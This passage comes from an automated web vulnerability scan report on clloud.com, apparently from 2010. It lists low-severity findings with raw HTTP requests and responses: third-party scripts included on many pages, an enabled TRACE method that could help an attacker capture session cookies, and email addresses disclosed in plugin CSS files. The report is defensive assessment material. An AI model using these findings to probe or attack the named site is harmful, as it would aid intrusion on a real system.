<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.34. http://clloud.com/tag/ipad/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/ipad/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/ipad/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:51:37 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.35. http://clloud.com/tag/iphone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/iphone/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/iphone/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:51:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.36. http://clloud.com/tag/microsoft/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/microsoft/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/microsoft/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:51:44 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.37. http://clloud.com/tag/rackspace-cloud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/rackspace-cloud/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/rackspace-cloud/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:52:03 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...

3.38. http://clloud.com/tag/rackspace/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/rackspace/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/rackspace/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:51:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Content-Length: 47326
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...

3.39. http://clloud.com/tag/softlayer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/softlayer/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/softlayer/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:52:10 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.40. http://clloud.com/tag/storage-cloud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/storage-cloud/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/storage-cloud/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:52:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...

3.41. http://clloud.com/tag/vps-cloud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/vps-cloud/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/vps-cloud/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:53:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.42. http://clloud.com/tag/vps-net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/vps-net/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/vps-net/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:52:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.43. http://clloud.com/tag/win-an-ipad/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/win-an-ipad/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/win-an-ipad/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:53:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.44. http://clloud.com/tag/windows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/windows/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/windows/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:53:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.45. http://clloud.com/tutorials-and-tips/midphase-hosting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tutorials-and-tips/midphase-hosting/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tutorials-and-tips/midphase-hosting/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:48:17 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=310>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.46. http://clloud.com/tutorials-and-tips/rackspace-cloud-upload-with-php-api-troubleshooting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tutorials-and-tips/rackspace-cloud-upload-with-php-api-troubleshooting/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tutorials-and-tips/rackspace-cloud-upload-with-php-api-troubleshooting/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:47:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=211>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.47. http://clloud.com/tutorials-and-tips/uploading-files-to-rackspace-cloud-using-php-aka-mosso/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tutorials-and-tips/uploading-files-to-rackspace-cloud-using-php-aka-mosso/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tutorials-and-tips/uploading-files-to-rackspace-cloud-using-php-aka-mosso/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:48:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=170>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

4. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: clloud.com
Cookie: 870a6d25449338a5

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:23:21 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: clloud.com
Cookie: 870a6d25449338a5


5. Email addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. http://clloud.com/wp-content/plugins/recaptcha-form/gd-recaptcha.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /wp-content/plugins/recaptcha-form/gd-recaptcha.css

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/plugins/recaptcha-form/gd-recaptcha.css HTTP/1.1
Host: clloud.com
Proxy-Connection: keep-alive
Referer: http://clloud.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:18:36 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Sat, 10 Apr 2010 17:20:31 GMT
ETag: "deb10-3a1-483e520fc55c0"
Accept-Ranges: bytes
Content-Length: 929
Content-Type: text/css

/*

CSS file for Gatt Design reCAPTCHA Form WordPress plugin
Copyright 2009 Gatt Design (email : plugins@gattdesign.co.uk)

The CSS provides the styling information for the Gatt Design reCAPTCHA Form WordPress plugin.
Edit this file only if you are comfortable with editing CSS files!

*/

/* Form Objects */
input
...[SNIP]...

5.2. http://clloud.com/wp-content/plugins/wp-recaptcha/recaptcha.css  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /wp-content/plugins/wp-recaptcha/recaptcha.css

Issue detail

The following email addresses were disclosed in the response:

Request

GET /wp-content/plugins/wp-recaptcha/recaptcha.css HTTP/1.1
Host: clloud.com
Proxy-Connection: keep-alive
Referer: http://clloud.com/
Accept: text/css,*/*;q=0.1
